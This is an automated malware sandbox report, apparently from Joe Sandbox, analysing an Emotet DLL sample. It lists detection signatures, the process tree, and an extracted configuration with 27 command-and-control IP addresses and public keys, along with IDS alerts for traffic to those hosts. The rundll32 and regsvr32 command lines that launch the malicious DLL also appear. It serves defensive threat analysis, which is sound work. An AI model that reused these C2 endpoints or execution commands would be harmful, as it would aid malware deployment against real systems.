Play interactive tour

Edit tour

Windows Analysis Report nV5Wu77N8J.dll

Overview

General Information

Sample Name:	nV5Wu77N8J.dll
Analysis ID:	553353
MD5:	a0306b7a6a12022e4fc8e586b0bc90ec
SHA1:	ee7d221826a725a2110bbddbea34bd14522b5ab4
SHA256:	9b1ca060b5a969f03c4c8d99ad487a454742e47fff97343a90afacb5da7d9589
Tags:	32dllexe
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Changes security center settings (notifications, updates, antivirus, firewall)

Sigma detected: Suspicious Call by Ordinal

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

AV process strings found (often used to terminate AV products)

PE file contains an invalid checksum

PE file contains strange resources

Tries to load missing DLLs

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Connects to several IPs in different countries

Potential key logger detected (key state polling based)

Registers a DLL

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

svchost.exe (PID: 6772 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

loaddll32.exe (PID: 6788 cmdline: loaddll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 6852 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6944 cmdline: rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6612 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 6932 cmdline: regsvr32.exe /s C:\Users\user\Desktop\nV5Wu77N8J.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

rundll32.exe (PID: 7112 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6976 cmdline: rundll32.exe C:\Users\user\Desktop\nV5Wu77N8J.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6428 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oxcjjbulglczzu\tjxbcbc.cmd",JEKd MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6596 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Oxcjjbulglczzu\tjxbcbc.cmd",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 3428 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6788 -s 512 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 6820 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6952 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7000 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7048 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 5496 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 2368 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 4488 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 4624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 808 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

WerFault.exe (PID: 6300 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6788 -ip 6788 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 204 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 1304 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 1356 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5264 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.336582284.00000000054B0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.336161253.0000000004DD0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000001.00000000.296629194.0000000002B00000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.336665007.0000000005610000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.336717142.0000000005641000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.680318843.00000000032F0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.336600440.00000000054E1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000001.00000000.296654820.0000000002B31000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.336482614.0000000005380000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000001.00000002.321734731.0000000002B00000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.336517253.00000000053B1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.336197242.0000000004E01000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.290395049.0000000004991000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.680592852.00000000034C1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000015.00000002.339368070.0000000004971000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000015.00000002.339330671.0000000004940000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000001.00000000.299013072.0000000002B00000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000001.00000000.299132771.0000000002B31000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.290320378.0000000004960000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author
8.2.rundll32.exe.4dd0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.32f0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5610000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.4960000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
1.0.loaddll32.exe.2b00000.3.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.54e0000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
1.2.loaddll32.exe.2b00000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.32f0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
1.2.loaddll32.exe.2b00000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
21.2.rundll32.exe.4940000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.54b0000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
21.2.rundll32.exe.4940000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5610000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.34c0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.53b0000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
1.2.loaddll32.exe.2b30000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
1.0.loaddll32.exe.2b00000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
1.0.loaddll32.exe.2b00000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4e00000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
1.0.loaddll32.exe.2b00000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
21.2.rundll32.exe.4970000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.54b0000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.4960000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5380000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5640000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
1.0.loaddll32.exe.2b30000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5380000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
1.0.loaddll32.exe.2b30000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.regsvr32.exe.4990000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4dd0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 25 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6852, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1, ProcessId: 6944

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 21.2.rundll32.exe.4940000.0.raw.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Multi AV Scanner detection for submitted file

Show sources

Source: nV5Wu77N8J.dll	Virustotal: Detection: 16%			Perma Link
Source: nV5Wu77N8J.dll	ReversingLabs: Detection: 13%

Source: nV5Wu77N8J.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000012.00000003.308936560.0000000005178000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308991217.0000000005178000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000012.00000003.308936560.0000000005178000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308991217.0000000005178000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.304374143.00000000030C5000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.304124899.00000000030C5000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.304021128.0000000004DA9000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000012.00000003.308936560.0000000005178000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308991217.0000000005178000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.308927946.0000000005172000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000012.00000003.308936560.0000000005178000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308991217.0000000005178000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000012.00000003.308936560.0000000005178000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308991217.0000000005178000.00000004.00000040.sdmp
Source:	Binary string: nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000012.00000002.320897103.0000000002D02000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.308927946.0000000005172000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308983031.0000000005175000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.304577343.00000000030BF000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.304118861.00000000030BF000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000012.00000003.308927946.0000000005172000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308983031.0000000005175000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.308936560.0000000005178000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308991217.0000000005178000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.308975405.0000000005170000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.308975405.0000000005170000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.308975405.0000000005170000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.308936560.0000000005178000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308991217.0000000005178000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.304133012.00000000030CB000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.304258466.00000000030CB000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 00000012.00000003.308927946.0000000005172000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000012.00000003.304133012.00000000030CB000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.304258466.00000000030CB000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.308975405.0000000005170000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.308975405.0000000005170000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.308936560.0000000005178000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308991217.0000000005178000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000012.00000003.304374143.00000000030C5000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.304124899.00000000030C5000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000012.00000003.308936560.0000000005178000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308991217.0000000005178000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000012.00000003.304577343.00000000030BF000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.304118861.00000000030BF000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.4:49770 -> 45.138.98.34:80
Source: Traffic	Snort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.4:49771 -> 69.16.218.101:8080

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 69.16.218.101 144			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.138.98.34 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 45.138.98.34:80
Source: Malware configuration extractor	IPs: 69.16.218.101:8080
Source: Malware configuration extractor	IPs: 51.210.242.234:8080
Source: Malware configuration extractor	IPs: 185.148.168.220:8080
Source: Malware configuration extractor	IPs: 142.4.219.173:8080
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 104.131.62.48:8080
Source: Malware configuration extractor	IPs: 62.171.178.147:8080
Source: Malware configuration extractor	IPs: 217.182.143.207:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 210.57.209.142:8080
Source: Malware configuration extractor	IPs: 159.69.237.188:443
Source: Malware configuration extractor	IPs: 116.124.128.206:8080
Source: Malware configuration extractor	IPs: 128.199.192.135:8080
Source: Malware configuration extractor	IPs: 195.154.146.35:443
Source: Malware configuration extractor	IPs: 185.148.168.15:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 190.90.233.66:443
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 104.131.62.48 104.131.62.48

Source: global traffic

TCP traffic: 192.168.2.3:49749 -> 69.16.218.101:8080

Source: unknown

Network traffic detected: IP country count 11

Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101

Source: svchost.exe, 0000001B.00000003.414114890.000001BC5678E000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
Source: svchost.exe, 0000001B.00000003.414114890.000001BC5678E000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
Source: svchost.exe, 0000001B.00000003.414140821.000001BC5679F000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.414114890.000001BC5678E000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN",